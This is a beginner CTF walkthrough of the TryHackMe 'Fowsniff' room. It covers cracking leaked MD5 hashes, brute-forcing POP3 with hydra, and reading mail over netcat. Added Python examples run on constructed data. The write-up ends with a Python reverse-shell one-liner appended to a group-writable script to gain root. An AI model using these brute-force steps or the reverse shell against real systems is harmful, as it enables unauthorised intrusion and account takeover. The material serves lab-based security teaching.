TryHackMe Walkthrough | Fowsniff

Aditya Kumar
4 min read · Jun 28, 2021


A beginner-friendly CTF challenge

This machine is brilliant for new starters. You will have to enumerate the machine by finding open ports, do some online research (it's amazing how much information Google can find for you), crack hashes, brute-force a POP3 login and much more!

Lets get started.

Prerequisites

Before deploying the machine, make sure your VPN is connected. Deploy the machine once the VPN is up.

Reconnaissance

I started by gathering information and checking which ports are open with a basic nmap scan.

Port 80 is open, so there must be a web page, and there are also services on ports 110 (POP3) and 143 (IMAP) which might be interesting.

Checking the webpage

On the web page we can see a Twitter account username.

This Twitter account had posted a Pastebin link to leaked usernames and passwords.

We get a list of usernames (e-mail accounts) with their passwords as MD5 hashes.

MD5 is a hash, not encryption, so the passwords cannot be decrypted; but the hashes are unsalted, so common passwords can simply be looked up in a precomputed table. THM points to the hashkiller online lookup for this.

Since POP3 is available, we can use these credentials to brute-force the login. Save all the usernames in users.txt and all the cracked passwords in pass.txt.
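As an added worked example (not code from the original walkthrough), here is the hash-cracking and list-building step in Python. The users, passwords and wordlist are constructed for the example and are not the room's Pastebin data; the "leak" is generated at run time from the constructed plaintexts so the script runs offline, and one user is deliberately left uncrackable to show what an uncracked entry does to the lists.

```python
"""Crack an unsalted MD5 credential dump against a wordlist and turn the result
into the users.txt / pass.txt pair that the hydra step consumes."""
import hashlib


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


# Constructed data: these users and hashes are NOT the room's Pastebin contents.
# The "leak" is generated from known plaintexts so the example is self-contained;
# a real dump would be pasted in as lines of the form user:hash.
_CONSTRUCTED_PLAINTEXTS = {
    "alice": "Summer2018",
    "bob": "letmein",
    "carol": "c0rrectH0rseBatteryStaple",  # absent from the wordlist: stays uncracked
}
LEAK = [f"{user}:{md5_hex(pw)}" for user, pw in _CONSTRUCTED_PLAINTEXTS.items()]

# Constructed mini wordlist standing in for rockyou.txt or an online lookup table.
WORDLIST = ["password", "123456", "letmein", "Summer2018", "qwerty"]


def parse_leak(lines):
    """Return [(user, md5hex)] for every well-formed user:hash line; junk is skipped."""
    creds = []
    for line in lines:
        line = line.strip()
        if ":" not in line:
            continue
        user, digest = line.rsplit(":", 1)  # rsplit: the user part may be an e-mail address
        digest = digest.strip().lower()
        if len(digest) == 32 and all(c in "0123456789abcdef" for c in digest):
            creds.append((user.strip(), digest))
    return creds


def crack(lines, wordlist):
    """{user: plaintext} for every hash present in the wordlist. MD5 here is
    unsalted, so each candidate is hashed once and compared against all users;
    this is exactly why a public lookup table such as hashkiller works."""
    table = {md5_hex(word): word for word in wordlist}
    return {user: table[digest] for user, digest in parse_leak(lines) if digest in table}


def hydra_lists(lines, wordlist):
    """(users, passwords) for `hydra -L users.txt -P pass.txt`. Every user from the
    dump is kept, not only the cracked ones: passwords get reused, so a cracked
    password may unlock an account whose own hash was not cracked."""
    cracked = crack(lines, wordlist)
    users = [user for user, _ in parse_leak(lines)]
    passwords = sorted(set(cracked.values()))
    return users, passwords


def write_lists(lines, wordlist, users_path="users.txt", pass_path="pass.txt"):
    """Write the two files hydra expects and return the cracked credentials."""
    users, passwords = hydra_lists(lines, wordlist)
    with open(users_path, "w") as f:
        f.write("\n".join(users) + "\n")
    with open(pass_path, "w") as f:
        f.write("\n".join(passwords) + "\n")
    return crack(lines, wordlist)


if __name__ == "__main__":
    for user, password in write_lists(LEAK, WORDLIST).items():
        print(f"{user}: {password}")
```

Running it writes users.txt with all three constructed users and pass.txt with the two passwords the wordlist recovered; carol's hash stays uncracked, but her username is still fed to hydra because she may reuse one of the other passwords.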

Brute-Forcing

I used Hydra.

hydra -L users.txt -P pass.txt pop3://<IP>

And we found a valid username and password.

Connecting to the POP3 service with netcat (POP3 was on port 110 in the scan):

nc <Target_IP> 110

After logging in with USER <name> and PASS <password>, we have 2 messages; the information for the flags is hidden in them. Retrieve them one at a time:

retr 1

The first message contains the password for the SSH login.

retr 2

The second message gives us the username for the SSH login.
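The brute-force and the mail-reading steps above, as an added example that is not part of the original walkthrough. It shows both sides of the POP3 dialogue that hydra and the netcat session drive, against an in-process fake POP3 server (a constructed account alice / Summer2018 and two constructed messages, none of it the room's data) connected over a socketpair, so no target is needed; the connect() helper is where a socket.create_connection to port 110 would go for a real host.

```python
"""POP3 as hydra and netcat see it: the brute force (USER/PASS per candidate pair) and the mail retrieval (RETR n). A fake in-process POP3 server stands in for the target."""
import itertools
import socket
import threading

# Constructed account and mail for the fake server; not the room's real data.
VALID_USER, VALID_PASS = "alice", "Summer2018"
MAILBOX = [
    "From: it@example.test\r\nSubject: reset\r\n\r\nTemporary shell password: ChangeMe-Now\r\n",
    "From: hr@example.test\r\nSubject: accounts\r\n\r\nLog in with your usual username.\r\n",
]

def fake_pop3_server(conn):
    """Minimal POP3 responder: USER, PASS, RETR, QUIT (RFC 1939 subset)."""
    rfile = conn.makefile("rb")
    send = lambda line: conn.sendall((line + "\r\n").encode())
    send("+OK fake POP3 ready")
    user, authed = None, False
    while True:
        raw = rfile.readline()
        if not raw:
            break
        cmd, _, arg = raw.decode(errors="replace").strip().partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            user = arg
            send("+OK")  # real servers answer +OK to USER even for unknown names
        elif cmd == "PASS":
            authed = user == VALID_USER and arg == VALID_PASS
            send("+OK logged in" if authed else "-ERR [AUTH] Authentication failed")
        elif cmd == "QUIT":
            send("+OK bye")
            break
        elif cmd == "RETR" and authed and arg.isdigit() and 1 <= int(arg) <= len(MAILBOX):
            msg = MAILBOX[int(arg) - 1]
            send(f"+OK {len(msg)} octets")
            for line in msg.splitlines():  # byte-stuff body lines that start with "."
                send("." + line if line.startswith(".") else line)
            send(".")  # a lone "." terminates the multi-line response
        else:
            send("-ERR unknown command or no such message")
    conn.close()

class Pop3Client:
    """Raw-socket POP3 client that records both sides, like a netcat session shows."""
    def __init__(self, sock):
        self.sock, self.rfile, self.transcript = sock, sock.makefile("rb"), []
        self._readline()  # server greeting
    def _readline(self):
        line = self.rfile.readline().decode(errors="replace").rstrip("\r\n")
        self.transcript.append("S: " + line)
        return line
    def cmd(self, line):
        self.transcript.append("C: " + line)
        self.sock.sendall((line + "\r\n").encode())
        return self._readline()
    def login(self, user, password):
        self.cmd(f"USER {user}")
        return self.cmd(f"PASS {password}").startswith("+OK")
    def retr(self, n):
        if not self.cmd(f"RETR {n}").startswith("+OK"):
            return None
        body = []
        while (line := self._readline()) != ".":
            body.append(line[1:] if line.startswith(".") else line)  # undo byte-stuffing
        return "\n".join(body)
    def close(self):
        self.cmd("QUIT")
        self.sock.close()

def connect():
    # Fake target over a socketpair; against a real host use Pop3Client(socket.create_connection((host, 110))).
    client_side, server_side = socket.socketpair()
    threading.Thread(target=fake_pop3_server, args=(server_side,), daemon=True).start()
    return Pop3Client(client_side)

def brute_force(users, passwords):
    """hydra -L users.txt -P pass.txt pop3://<IP>: fresh connection per attempt, stop at the first +OK to PASS."""
    for user, password in itertools.product(users, passwords):
        client = connect()
        ok = client.login(user, password)
        client.close()
        if ok:
            return user, password
    return None

def read_mailbox(user, password):
    """The netcat session: log in, then RETR 1, RETR 2, ... until the server says -ERR."""
    client = connect()
    messages = []
    if client.login(user, password):
        while (msg := client.retr(len(messages) + 1)) is not None:
            messages.append(msg)
    client.close()
    return messages, client.transcript
```

read_mailbox() returns the transcript as well as the messages, so printing it shows the same C:/S: exchange you would see by hand in netcat, including the -ERR the server gives for RETR 3 that tells you the mailbox has only two messages.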

SSH

Using these credentials we log in via SSH.

Looking for files owned by the group our user belongs to (users), since anything there that is also group-writable is a candidate for privilege escalation:

find / -group users -type f 2>/dev/null

Our main focus is /opt/cube/cube.sh, which we are able to edit.
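Added example, not the walkthrough's own code: the find command above lists every file owned by the users group, but what matters is which of those we can actually write to. This walk reports only regular files whose group is one of ours and that have the group-write bit set (the find equivalent is find ROOT -type f -group GROUP -perm -g=w). The directory tree it checks is constructed in a temp dir, with a group-writable cube.sh beside a file that is not, so it runs anywhere; on a target you would pass the real root and let the process's own groups be used.

```python
"""Narrow `find / -group users -type f` to what matters for privilege escalation:
regular files owned by one of our groups that the group-write bit lets us modify.
The tree walked here is constructed in a temp dir; on a target, pass root="/"."""
import os
import stat
import tempfile

def group_writable_files(root, gids=None):
    """Paths under root whose group is in gids (default: the groups of the current
    process) and whose mode has g+w set. Unreadable directories are skipped,
    which is what 2>/dev/null hides in the walkthrough's find command."""
    if gids is None:
        gids = set(os.getgroups()) | {os.getgid()}
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks out of the tree
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_gid in gids and st.st_mode & stat.S_IWGRP:
                hits.append(path)
    return sorted(hits)

def build_demo_tree():
    """Constructed stand-in for the target's filesystem: an opt/cube/cube.sh that is
    group-writable next to a file that is not. Returns (root, cube_sh)."""
    root = tempfile.mkdtemp(prefix="fowsniff-demo-")
    cube_dir = os.path.join(root, "opt", "cube")
    os.makedirs(cube_dir)
    cube_sh = os.path.join(cube_dir, "cube.sh")
    readme = os.path.join(cube_dir, "README")
    for path in (cube_sh, readme):
        with open(path, "w") as f:
            f.write("#!/bin/bash\necho 'hello'\n")
    os.chmod(cube_sh, 0o664)  # rw-rw-r--: anyone in the file's group can edit it
    os.chmod(readme, 0o644)   # rw-r--r--: only the owner can
    return root, cube_sh

def run_demo():
    """Walk the constructed tree as the group the demo files were created in
    (standing in for 'users') and return (hits, cube_sh)."""
    root, cube_sh = build_demo_tree()
    gid = os.lstat(cube_sh).st_gid
    return group_writable_files(root, gids={gid}), cube_sh

if __name__ == "__main__":
    hits, _ = run_demo()
    print("\n".join(hits))
```

Only cube.sh comes back from the demo tree, which is the same conclusion the walkthrough reaches from the longer find output.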

Edit cube.sh and append our reverse shell payload to it. <IP> is the attacking machine's VPN address, and port 1234 is where a netcat listener must already be waiting:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

When cube.sh is executed, the payload connects back and our netcat listener receives a shell. The script runs with elevated privileges, so the shell that comes back is not limited to our SSH user.

And we found our root flag.

Thanks for reading! If you found this helpful, please leave a clap.
